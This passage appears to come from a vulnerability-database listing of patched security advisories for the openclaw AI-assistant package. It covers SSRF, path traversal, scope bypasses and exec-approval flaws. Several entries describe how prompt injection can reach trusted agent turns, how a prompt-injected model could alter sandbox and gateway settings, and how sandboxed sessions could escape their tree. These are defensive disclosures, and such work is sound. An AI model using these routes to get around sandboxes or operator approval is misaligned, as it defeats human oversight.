OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation ## Summary Feishu webhook reads and parses unauthenticated request bodies before signature validation ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Feishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`. ## Fix Commit(s) - `5e8cb22176e9235e224be0bc530699261eb60e53` |
Affected by 150 other vulnerabilities. |
|
VCID-4urc-4536-pqhk
Aliases: GHSA-gfmx-pph7-g46x |
OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade ## Impact Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade. Lower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @tdjackey for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-5atj-2a7b-57g5
Aliases: CVE-2026-41344 GHSA-5h2w-qmfp-ggp6 |
OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose` ## Summary The `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`. ## Impact A write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended. ## Affected Component `src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`). |
Affected by 150 other vulnerabilities. |
|
VCID-5dj5-mk23-kyds
Aliases: GHSA-j42q-r6qx-xrfp |
Duplicate Advisory: OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-52q4-3xjc-6778. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Google Chat group policy enforcement that relies on mutable space display names. Attackers can rebind group policies by changing or colliding space display names to gain unauthorized access to protected resources. | There are no reported fixed by versions. |
|
VCID-5rgx-2krs-guck
Aliases: CVE-2026-41396 GHSA-qcj9-wwgw-6gm8 |
OpenClaw: Workspace `.env` can override the bundled plugin trust root ## Summary Workspace `.env` can override the bundled plugin trust root ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-66nc-bn98-nbas
Aliases: GHSA-m5jp-p3r5-mfqp |
Duplicate Advisory: OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-h4jx-hjr3-fhgc. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope. | There are no reported fixed by versions. |
|
VCID-6849-th74-yqd5
Aliases: CVE-2026-33578 GHSA-63mg-xp9j-jfcm |
OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade ## Summary When only a route-level group allowlist was configured, sender policy resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy. ## Impact Any member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions. ## Affected Component `extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `e64a881ae0` (`Channels: preserve routed group policy`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-6bxd-kbse-sudx
Aliases: GHSA-mw7w-g3mg-xqm7 |
OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events ## Summary BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details BlueBubbles group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` applies the reaction path to the same mention gate as normal group messages. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`. ## Fix Commit(s) - `f8c98630785288cc1f1d0893503ef3b653a3cede` | There are no reported fixed by versions. |
|
VCID-6wth-qthz-yud8
Aliases: CVE-2026-42436 GHSA-c4qm-58hj-j6pj |
OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation ## Summary Browser snapshot and screenshot routes could expose internal page content after navigation. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Authenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages. ## Technical Details The fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows. ## Fix The issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `b75ad800a59009fc47eaa3471410f69046150e59` - PR: #66040 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-6y5w-am4s-6qa5
Aliases: CVE-2026-43530 GHSA-2cq5-mf3v-mx44 |
OpenClaw: busybox and toybox applet execution weakened exec approval binding ## Summary busybox and toybox applet execution weakened exec approval binding. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.23 < 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact Opaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification. ## Technical Details The fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations. ## Fix The issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `666f48d9b882a8a1415ca53f9567c72499d850c9` - PR: #65713 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @decsecre583 for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-733f-57ds-xugm
Aliases: GHSA-rf75-g96h-j3rm |
Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references. ### Original Description OpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked. |
Affected by 80 other vulnerabilities. |
|
VCID-73cz-n29z-uqem
Aliases: GHSA-pg8g-f2hf-x82m |
Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins. |
Affected by 60 other vulnerabilities. |
|
VCID-75yr-sbce-nkah
Aliases: CVE-2026-41914 GHSA-3fv3-6p2v-gxwj |
OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @adithyan-ak for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-7akj-469t-57hz
Aliases: GHSA-7jm2-g593-4qrc |
OpenClaw: Agent gateway config mutations could change protected operator settings ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings. This is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium. ## Fix OpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching. Fix commit: - `fe30b31a97a917ecc6e92f6c85378b6b20352422` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-7dyw-9b37-yqh4
Aliases: CVE-2026-41402 GHSA-hhq4-97c2-p447 |
OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass ## Summary Zalo webhook replay cache cross-target messageId scope bypass ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-7ntr-5dr5-9uf8
Aliases: GHSA-98ch-45wp-ch47 |
OpenClaw: Windows-compatible env override keys could bypass system.run approval binding ## Summary Before OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time. ## Impact An approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. This created an approval-integrity gap for affected host-exec flows. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination. |
Affected by 80 other vulnerabilities. |
|
VCID-7snr-fn3u-x3b8
Aliases: CVE-2026-43582 GHSA-xq94-r468-qwgj |
OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding ## Summary Browser SSRF hostname validation could be bypassed by DNS rebinding. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Browser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots. ## Technical Details The fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy. ## Fix The issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `121c452d666d4749744dc2089287d0227aae2ed3` - PR: #64367 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-7wmr-v7zb-6fc9
Aliases: CVE-2026-41392 GHSA-wpc6-37g7-8q4w |
OpenClaw: Shell init-file options could satisfy exec allowlist script matching ## Summary Before OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first. ## Impact This issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches ## Release Process Note The fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix. Thanks @cyjhhh for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-7z2s-k6ty-ekg1
Aliases: CVE-2026-41298 GHSA-5hff-46vh-rxmw |
OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill ## Summary Before OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session. ## Impact A read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @EaEa0001 for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-8uzb-xmf8-hbca
Aliases: CVE-2026-32846 GHSA-hggm-x7r9-mm7v |
OpenClaw is vulnerable to Path Traversal through path validation bypass OpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys. |
Affected by 150 other vulnerabilities. |
|
VCID-96jd-x87b-s3ey
Aliases: CVE-2026-41407 GHSA-jj6q-rrrf-h66h |
OpenClaw: Shared-secret comparison call sites leaked length information through timing ## Summary Before OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences. ## Impact The affected paths exposed a low-severity timing side channel on secret comparison. The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-9hcd-uj62-8yeu
Aliases: CVE-2026-43533 GHSA-66r7-m7xm-v49h |
OpenClaw: QQBot media tags could read arbitrary local files through reply text ## Summary QQBot media tags could read arbitrary local files through reply text. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact QQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling. ## Technical Details The fix enforces the media storage boundary for all outbound QQBot local file paths. ## Fix The issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `604777e4414cc3b2ff8861f18f4fb04374c702c6` - PR: #63271 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-9kgh-wj9w-ykff
Aliases: CVE-2026-43526 GHSA-2767-2q9v-9326 |
OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes ## Summary QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact QQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel. ## Technical Details The fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy. ## Fix The issue was fixed in #63495 and #65788. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a` - `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d` - PR: #63495, #65788 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @threalwinky for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-9uyu-y9qv-u7e1
Aliases: CVE-2026-35657 GHSA-5jvj-hxmh-6h6j |
OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope ## Summary Gateway HTTP Session History Route Bypasses Operator Read Scope ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details The HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`. ## Fix Commit(s) - `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` |
Affected by 0 other vulnerabilities. Affected by 194 other vulnerabilities. |
|
VCID-9xgq-vtg2-jucq
Aliases: CVE-2026-42426 GHSA-67mf-f936-ppxf |
## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval. The pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-9xrt-mv81-3yc8
Aliases: CVE-2026-41400 GHSA-2w79-r9g8-wmcr |
OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062) ## Summary Incomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation ## Current Maintainer Triage - Normalized severity: medium - Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00 OpenClaw thanks @Kazamayc for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-9yxw-fj1c-tff9
Aliases: GHSA-q2qc-744p-66r2 |
OpenClaw: `session_status` sessionId resolution bypasses sandboxed session-tree visibility ## Summary `session_status` sessionId resolution bypasses sandboxed session-tree visibility ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `>= 2026.3.11, <= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details `session_status` previously resolved a `sessionId` to a canonical session key after early visibility checks, letting sandboxed children reach parent or sibling sessions that were blocked by explicit `sessionKey`. Commit `d9810811b6c3c9266d7580f00574e5e02f7663de` enforces visibility after `sessionId` resolution so sandboxed callers cannot escape their session tree. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d9810811b6c3c9266d7580f00574e5e02f7663de`. ## Fix Commit(s) - `d9810811b6c3c9266d7580f00574e5e02f7663de` |
Affected by 150 other vulnerabilities. |
|
VCID-a2p8-ydn6-3bbr
Aliases: CVE-2026-35617 GHSA-52q4-3xjc-6778 |
OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Summary Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Google Chat group authorization previously relied on mutable space display names, which allowed policy rebinding when names changed or collided. Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`. ## Fix Commit(s) - `11ea1f67863d88b6cbcb229dd368a45e07094bff` |
Affected by 150 other vulnerabilities. |
|
VCID-a2wx-7b8h-c3h1
Aliases: CVE-2026-41391 GHSA-7ggg-pvrf-458v |
OpenClaw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic ## Summary `PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-a46u-tnbh-fyhs
Aliases: GHSA-f934-5rqf-xx47 |
OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths ## Summary The QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set. ## Impact When the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy. ## Affected versions - Affected: `< 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. Workspace containment alone is no longer sufficient. Verified in `v2026.4.15`: - `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path. - `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior. Fix commit included in `v2026.4.15` and absent from `v2026.4.14`: - `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026 Thanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue. |
Affected by 24 other vulnerabilities. |
|
VCID-a4jz-y9s4-zkfg
Aliases: CVE-2026-44991 GHSA-c28g-vh7m-fm7v |
OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners ## Impact OpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true: - a channel plugin declared `commands.enforceOwnerForCommands: true`; - the channel accepted wildcard inbound senders with `allowFrom: ["*"]`; - no explicit `commands.ownerAllowFrom` was configured. In that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel. The issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected versions: `<= 2026.4.20` - Patched version: `2026.4.21` The latest public release, `2026.4.21`, contains the fix. ## Patches The fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership. Fix commits: - `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main` - `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line ## Workarounds Upgrade to `openclaw@2026.4.21` or later. Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities. ## Credits OpenClaw thanks @zsxsoft for reporting. |
Affected by 11 other vulnerabilities. |
|
VCID-acy1-83py-efhr
Aliases: GHSA-r4c2-gq3j-7rpj |
Duplicate Advisory: OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-vcx4-4qxg-mfp4. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in Telegram webhook authentication that allows attackers to brute-force weak webhook secrets. The vulnerability enables repeated authentication guesses without throttling, permitting attackers to systematically guess webhook secrets through brute-force attacks. | There are no reported fixed by versions. |
|
VCID-arks-g6hw-abbw
Aliases: CVE-2026-43569 GHSA-939r-rj45-g2rj |
OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins ## Summary Workspace provider auth choices could auto-enable untrusted provider plugins. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.9` - Patched versions: `>= 2026.4.9` ## Impact Non-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup. ## Technical Details The fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled. ## Fix The issue was fixed in #62368. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `2d97eae53e212ae26f3aebcd6a50ffc6877f770d` - PR: #62368 ## Release Process Note Users should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zpbrent for reporting this issue. |
Affected by 59 other vulnerabilities. |
|
VCID-atn7-pn13-3fgb
Aliases: GHSA-v3qc-wrwx-j3pw |
